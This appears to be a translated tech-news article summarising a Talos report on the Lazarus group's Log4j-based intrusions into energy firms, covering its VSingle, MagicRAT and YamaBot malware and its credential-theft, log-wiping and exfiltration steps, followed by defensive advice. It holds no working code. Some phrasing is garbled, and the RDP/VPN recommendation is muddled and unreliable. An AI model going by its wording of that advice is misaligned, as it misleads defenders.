Lazarus, also known as Hidden Cobra or Zinc, is a well-known cyber-espionage threat actor who hails from North Korea, according to the US government. The threat actor has been in business since 2009 and has frequently switched targets over time, probably in line with the interests of the nation-state.
Between 2020 and 2021, Lazarus affected defense companies in more than a dozen countries, including the US focused selected entities to assist strategic sectors such as aerospace and military equipment.
The threat actor is now targeting energy suppliers, according to a new report from Cisco Talos.
TO SEE: Mobile Device Security Policy (Tech Republic Premium)
Attack mode operandi
Lazarus often uses very similar techniques from one attack to another, as expounded by Talos (Image A).
In the campaign reported by Talos, the first infection vector is the exploitation of the Log4j vulnerability on web-facing VMware Horizon servers.
Once the target system is compromised, Lazarus downloads its toolkit from a web server it manages.
Talos witnessed three variants of the attack. Each variant consists of a different malware implementation. Lazarus could only use VSingle, VSingle and MagicRAT, or a new malware called YamaBot.
Variations in the attack also imply the use of other tools such as mimikatz for credential collection, proxy tools to set SOCKs proxies, or reverse tunneling tools such as Plink.
Lazarus also checks for installed antivirus software for endpoints and disables Windows Defender antivirus.
The attackers also copy portions of Windows Registry Hives, for offline analysis and possible misuse of credentials and policy information, and gather information from Active Directory before creating their own highly privileged users. These users would be removed once the attack is fully executed, in addition to removing temporary tools and cleaning Windows Event logs.
At this point, the attackers take the time to explore the systems, listing multiple folders and placing those of particular interest, usually patented intellectual property, in a RAR archive file for exfiltration. The exfiltration is done through one of the malware used in the attack.
TO SEE: Protect your business from cybercrime with this dark web monitoring service (TechRepublic Academy)
Exclusive malware developed by Lazarus
Lazarus is a state-sponsored cyber-espionage threat actor that has the ability to develop and distribute its own malware families. Lazarus has created several malware that uses it for its activities. Three different malware is used in the current attack campaign exposed by Talos, called VSingle, YamaBot and MagicRAT.
VSingle is a persistent backdoor used by the threat actor to perform various activities such as reconnaissance, exfiltration and manual backdoor. It is a basic stager that allows attackers to deploy more malware or open a reverse shell that connects to a C2 server controlled by the attackers, allowing them to execute commands via cmd.exe.
With VSingle, Lazarus typically runs commands on infected computers to collect information about the system and its network. All this information is mandatory for lateral movement activities, where attackers can place more malware on other systems or find information to exfiltrate later.
Lazarus has also used VSingle to force the system to cache users’ credentials so that it is possible to collect them afterwards. The threat actor has also used it to get administrative privileges for users added to the system. This way, if the malware is completely removed, attackers can still access the network via Remote Desktop Protocol (RDP).
Lazarus uses two additional software when using VSingle: a utility called Plink, which can create encrypted tunnels between systems via the Secure Shell (SSH) protocol, and another tool called 3proxy, a small proxy server that is publicly available. is available.
MagicRAT is the latest malware developed by the Lazarus team, according to Talos. It is a persistent malware developed in the C++ programming language. Interestingly, it uses the Qt framework, a programming library used for graphical interfaces. Since the RAT does not have a graphical interface, it is believed that using the Qt framework increases the complexity of malware analysis.
Once active, the malware provides its C2 server with basic information about the system and its environment. It also provides the attacker with a remote shell and a few other features, such as an automatic malware removal or a sleep function to try and avoid being detected.
In some attacks by the Lazarus group, MagicRAT has deployed the VSingle malware.
During one attack, the Lazarus group deployed YamaBot after several attempts to deploy the VSingle malware. YamaBot is written in the Go programming language and, like its colleagues, begins by collecting basic information about the system.
YamaBot provides the ability to browse folders and display files, download and run files or arbitrary commands on the infected computer, or return information about processes running on the computer.
Energy companies at risk
While Talos doesn’t reveal much about the real targets of this attack campaign, the researchers state that “Lazarus primarily targeted energy companies in Canada, the US and Japan. The main purpose of these attacks was probably to gain long-term access to victim networks to conduct espionage operations in support of the North Korean government’s objectives. This activity aligns with historic Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to transfer intellectual property.”
How to protect against the Lazarus cyberespionage threat?
The Lazarus group makes extensive use of common vulnerabilities to compromise businesses. In its current operation, it took advantage of the Log4j vulnerability to gain a first foothold on networks. Therefore, it is strongly recommended that operating systems and all software are kept up to date and patched to prevent exploitation of such vulnerabilities.
It is also recommended that all connections with RDP or VPN services come from outside the company, as attackers sometimes impersonate employees by using their credentials to log into the system. For this reason it is also recommended to multi-factor authentication (MFA)so an attacker cannot just use valid credentials to login to systems.
Finally, security solutions must be deployed and adapted to detect malware and possible misuse of legitimate tools such as Plink.
Revelation: I work for Trend Micro, but the opinions expressed in this article are mine.